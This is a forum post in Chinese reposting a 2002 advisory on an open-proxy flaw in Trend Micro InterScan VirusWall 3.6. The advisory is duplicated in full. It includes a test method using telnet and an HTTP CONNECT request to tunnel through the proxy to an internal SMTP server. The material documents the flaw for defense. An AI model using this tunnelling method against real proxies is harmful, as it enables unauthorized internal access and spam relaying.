sansui110
2002-12-16, 08:20 PM
趨勢科技 Trend Micro InterScan VirusWall未授權代理連接漏洞
受影響系統:
趨勢科技 Trend Micro InterScan VirusWall 3.6 Build 1182
趨勢科技 Trend Micro InterScan VirusWall 3.6
不受影響系統:
趨勢科技 Trend Micro InterScan VirusWall 3.7 Build 1190
趨勢科技 Trend Micro InterScan VirusWall是由趨勢科技 Trend Micro開發和維護的網關防病毒軟體,包括對EMAIL、FTP、HTTP的病毒防護。趨勢科技 Trend Micro InterScan VirusWall不正確處理CONNECT方法連接代理,遠端攻擊者可以利用這個漏洞未授權通過代理訪問內部網路。
使用Telnet, SMTP, POP, etc. CONNECT方法連接InterScan VirusWall HTTP代理伺服器,可以未授權訪問代理伺服器後保護的主機,攻擊者可以利用這個問題獲得內部網路資源,濫用網路資源、發送垃圾信等非法活動。
資料來源:Volker Tanger ([email protected])
http://marc.theaimsgroup.com/?l=bugtraq&m=103910872431613&w=2
測試方法:警 告
以下程式(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!
Volker Tanger ([email protected])提供了如下測試方法:
you = 6.6.6.666
Trendmicro ISVW = 1.1.1.1 (http proxy at port 80)
Internal Mailserver = 2.2.2.2
connect with "telnet 1.1.1.1 80" to ISVW proxy and enter
CONNECT 2.2.2.2:25 / HTTP/1.0
response: mail server banner - and running SMTP session e.g. to send SPAM from.
臨時解決方法:
* 暫時關閉HTTP代理伺服器。
廠商修正程式:趨勢科技 Trend Micro
受影響系統:
趨勢科技 Trend Micro InterScan VirusWall 3.6 Build 1182
趨勢科技 Trend Micro InterScan VirusWall 3.6
不受影響系統:
趨勢科技 Trend Micro InterScan VirusWall 3.7 Build 1190
趨勢科技 Trend Micro InterScan VirusWall是由趨勢科技 Trend Micro開發和維護的網關防病毒軟體,包括對EMAIL、FTP、HTTP的病毒防護。趨勢科技 Trend Micro InterScan VirusWall不正確處理CONNECT方法連接代理,遠端攻擊者可以利用這個漏洞未授權通過代理訪問內部網路。
使用Telnet, SMTP, POP, etc. CONNECT方法連接InterScan VirusWall HTTP代理伺服器,可以未授權訪問代理伺服器後保護的主機,攻擊者可以利用這個問題獲得內部網路資源,濫用網路資源、發送垃圾信等非法活動。
資料來源:Volker Tanger ([email protected])
http://marc.theaimsgroup.com/?l=bugtraq&m=103910872431613&w=2
測試方法:警 告
以下程式(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!
Volker Tanger ([email protected])提供了如下測試方法:
you = 6.6.6.666
Trendmicro ISVW = 1.1.1.1 (http proxy at port 80)
Internal Mailserver = 2.2.2.2
connect with "telnet 1.1.1.1 80" to ISVW proxy and enter
CONNECT 2.2.2.2:25 / HTTP/1.0
response: mail server banner - and running SMTP session e.g. to send SPAM from.
臨時解決方法:
* 暫時關閉HTTP代理伺服器。
廠商修正程式:趨勢科技 Trend Micro